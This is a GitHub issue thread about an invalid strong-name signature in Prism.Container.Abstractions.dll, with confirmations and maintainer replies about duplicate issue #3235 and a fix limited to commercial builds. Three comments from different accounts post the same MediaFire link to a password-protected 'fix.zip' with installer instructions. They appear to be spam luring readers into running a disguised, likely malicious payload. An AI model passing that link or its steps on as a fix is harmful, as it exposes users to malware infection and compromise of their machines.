### ISSUE TITLE
[BUG] Strong name signature not valid

### ISSUE THREAD

**Issue by smsaleem** [PrismLibrary/Prism#3240]
### Description

In the latest release of Prism.Container.Abstractions.dll,  assembly signing error, strong name signature not valid, is raised.

### Steps to Reproduce

Error occurs while deploying the assembly on client machine with ClickOnce.
### Platform with bug

WPF

### Affected platforms

Windows

### Did you find any workaround?

This issue is usually resolved when assembly is signed.

### Relevant log output

```shell
Strong name signature not valid for this assembly Prism.Container.Abstractions.dll.
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by laubjkri** [comment]
I can confirm. Using Prism.Container.Abstractions version 9.0.107.57918.

**Comment by dansiegel** [comment]
Thanks for the report. This is very strange indeed, I am looking into the issue.

**Comment by dansiegel** [comment]
closing as duplicate of #3235

**Comment by GrantGussie** [comment]
A year and a half later, this problem is still not fixed. 
There is no update available and the faulty software is still marked as "latest" stable in Nuget.

**Comment by dansiegel** [comment]
> A year and a half later, this problem is still not fixed. There is no update available and the faulty software is still marked as "latest" stable in Nuget.

Actually it is fixed for our Commercial Plus users, has been for quite some time. We just don't do service releases on NuGet. It will be available when we do release the first 9.1 preview.

**Comment by dansiegel** [comment]
@GrantGussie this GitHub issue is for tracking the public strong-name signing issue in the open-source NuGet release. It is not the right place to handle individual licensing, fulfillment, account access, refund demands, or commercial support matters.

To clarify the public issue:

- This was already closed as a duplicate of #3235.
- The signing issue has been addressed in the Commercial Plus builds.
- We do not publish service releases to the public NuGet feed for this line.
- The public NuGet feed will receive this when the first 9.1 preview is released.

If you purchased a commercial license and do not have access to the feed or package you believe you are entitled to, contact support directly with your license/order details so we can verify the account and resolve access. GitHub comments are not appropriate for discussing private licensing records, account access, or refund claims.

I also want to be clear: claims that Prism is intentionally posting non-functional software or conducting business unethically are not accurate and are not helpful. If there is a fulfillment or access problem, we will handle that through the proper support channel.
